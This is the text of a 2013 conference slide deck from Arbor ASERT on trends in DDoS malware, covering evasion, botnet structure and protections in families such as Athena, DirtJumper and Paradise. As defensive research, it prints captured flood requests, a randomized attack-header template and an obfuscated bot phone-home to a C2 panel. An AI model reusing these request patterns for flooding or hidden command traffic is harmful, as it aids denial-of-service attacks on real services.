Recent Advancements in DDoS Malware Jason Jones

Usenix LEET13

2  

Agenda

• Who am I? • Why? • What Hasn’t Changed • What Has Changed

– Better Blending In & Hiding – Better Botnet Building – Better protection

• Trends and Takeaways

3  

Who am I?

• Jason Jones –  Security Research Analyst on Arbor Networks’ ASERT –  Presented at

• BlackHat USA 2012 •  InfoSec Southwest 2013

–  Research interests •  IP reputation • Malware clustering • Data mining • Graph Theory / Combinatorics

4  

ASERT Malware Corral

• Arbor Security Engineering & Response Team • ASERT Malware Corral

– Malware storage + processing system – Processing occurs via sandbox, static methods – Tagging via behavioral and static methods

• Currently pulling in upwards of 100k samples / day

• 567 Unique family names tagged last year –  Includes DDoS, Bankers, Infostealers, APT, etc.

5  

Why?

• DDoS Becoming More of a Threat – SpamHaus –  “Triple Crown” – Political Motivations – Anon Ops – Ransom

• DDoS-specific Malware Evolving In Response to Our Response

What Hasn’t Changed

7  

Still the same…

• Most Malware Include – Basic GET/POST Flood – SYN and/or Connection Flood – UDP Flood

• Lots of IRC CnC Still Around • Many use hard-coded set of user-agents • Still broken

– Slowloris – ARME

8  

Still the same… (cont.)

•  .NET malware is still terrible – Most decompiles fine in .NET Reflector – Use .NET HTTP methods –  Looks mostly the same for DDoS

• Gh0st RAT variants still popular • Most are not fully protocol aware • Many don’t do SSL / HTTPS • Copy + Paste still prevalent

What Has Changed

10  

Better Blending In & Hiding on the Network

• HTTP CnC has always been popular –  Tended to be plaintext – Athena recently moved from IRC -> HTTP

• Obfuscates commands • Example:

–  a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D

– b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D

–  c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex

– Betabot employs encryption on phone-home • Adjustable phone-home intervals

–  Specify long intervals to avoid suspicion

11  

Better Blending In & Hiding on the Network (cont) • More Intelligent HTTP Attacks

– Requests look more legitimate now • Drive uses randomization in UA’s • Athena uses long list of legitimate UA’s

– More dynamic headers • Paradise borrowed from Armageddon2

– Ability to specify POST parameters • Target search boxes, login forms, etc • Use up DB queries, server processing • Randomized per request, avoid caching

12  

Example – DirtJumper Drive POST Attack POST /test HTTP/1.1 Host: 192.168.56.1:10000 User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://192.168.56.1:10000/ Content-Length: 2443 Content-Type: application/x-www-form-urlencoded login=q1un7q002imn2843b4qqmk29fsfyk883592qzn4jdgsguc2vy7sqpoi4mlujelbn5levvck21g6j265b48g6f59mocvnzm76en8rin3389c3epk3tgg89i4d796m85gt9hz0wjb4n19w00uh0m9t9xz8857506j08bj2a2r5203897du968e264456ci18b0d3flq2ka4avq9j99e77d31pqcf668654e9xl74u3csa54ygcx45wbg67t47p2p326b00t4r2z99i07z9j2792c10f00l66dt5vnnf90z4xty7kpf1epb1y5l34fwk0939y4c98hs9y856pqc0k03249rfzl640983e35cmw9i607d4zz1k9x3njz2r0v84624566zfoq4afc8c7ku8r31d37ad587cutfn4618476bnp822346s51sms408161jv7m69n2v5i1n4051t99uiru676596nao24j8dcse52a8dzdgcijz0khe0x7elf3w9c1502tjto4332fszyl424g3b911vc1026g79604035lbvk8h31v78b845rqj630ndd42946s18l4832b36ukd2pb917yr60q16e444m36wa9p2us9mj5b7ue4wv5e46m29l4ig8u9lf2wip8ogvv5q8eqj4rkw53k1fo277a3u1m5ca26xrv8fis4337z9p6wbp00u3jc2iq6i6f0rrr4c379x66p0e2z3y57s4kekk370h9w986yd8m5f7l2as0m090v96x42i14qdci43e444h8815jp923545719y2u3b5n450e9c036ws4643zvmp4663j8794w3h5yj71c324n12b3y96pi8487wv6z4xol0rkzq00jtpdgx05gidt8qt7ylyj36y40o2yzwh855x96ftw5qlagzpg2um99u7rap89fca26xrn90015msjbb5417kq037ssje971j8s159g68j0o30agjr2h9zg&......... login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]

13  

Example – BlackRev

GET /index.html HTTP/1.1 Host: victim.com Keep-Alive: 266 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3 Referer: http://victim.com/ Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

14  

Athena IRC + HTTP HTTP Attack GET|POST|HEAD /<params> HTTP/1.1!Host: <target>!Range: bytes= <range bytes string>!Connection: Keep-alive | close!

User-Agent: ObtainUserAgentString()!Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public |private | max-stale!

Vary: * | User-Agent!Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c |text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8!

Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1!Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip!

Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en!Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif!

Content-Length: <length> !X-a: b!

15  

Example – Athena HTTP Phone Home POST /gate.php HTTP/1.1 Host: panel-gc.co.uk:69 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Content-Length: 436 a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8 •  |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|

ver:v1.0.3|net:4.0| •  |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|

16  

Example – Paradise status=headers application/xml, image/png, text/html */*, text/html, text/html, application/xml text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c x-gzip, identity x-compress, x-zip, sdch x-compress ,deflate, gzip, x-gzip us-ua;q=0.5 az-us;q=0.9 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] http://www.snpp.com/ http://ask.fm/FlOoRNOoBlE http://www.thesimpsons.com/ http://mylarha.deviantart.com/ http://www.thesimpsonslatino.com/

17  

Building Better Botnets

• Use What’s Readily Available –  “Triple Crown” financial attacks

• Tiered CnC Structure • Dynamically update code with new attacks • Can easily adjust attacks if current attack is unsuccessful

– SpamHaus DNS Amplification • Open resolvers • Not botnet per se, but… • Highly successful

18  

Better Protections

• Store attacks in external DLL

– Paradise: Pulled down by main EXE – DLL is crypted

•  Restrict bots to geo regions –  Also blackholing connections

•  Drop other malware on the same machine •  Previously mentioned obfuscating / encrypting phone-

home •  More malware using encryption internal to binary •  More packers / obfuscations used

19  

Better Protections (cont.)

• More Junk Code • New Drive variant discards old phone home

–  2-stage phone home –  Base64 + underlying protection –  3 new attacks –  Can now specify hard-coded or random Cookie vals –  Still reversing…. –  Blog soon?

Trends and Takeaways

20  

Trends and Takeaways

•  DDoS becoming more of a feature of larger families –  Still plenty of standalone, but becoming more common in other malware

•  DNS amplification will likely make its way into malware soon –  Too successful not to –  Too easy not to

• More booter services popping up –  Many Athena HTTP CnC hostnames appear to be booter backends

•  Carberp source code leak will likely create a boom in carberp variants similar to ZeuS

21  

More Trends and Takeways…

• Traditional botnets with DDoS addons don’t DDOS much – DarkComet – Some Athena HTTP used to mostly drop other

malware • Nitol, Betabot, Andromeda, ZeuS • Appear to be botnet-for-hire types

• Still waiting for the first SPDY-aware malware J

• Proper mobile DDoS botnet soon?

22  

Questions/Comments/Feedback

•  jasonjones@arbor.net • @jasonljones

23  

Thanks:  Arbor/ASERT,  Marc  Eisenbarth,  Alex  Bardas  

Thank You!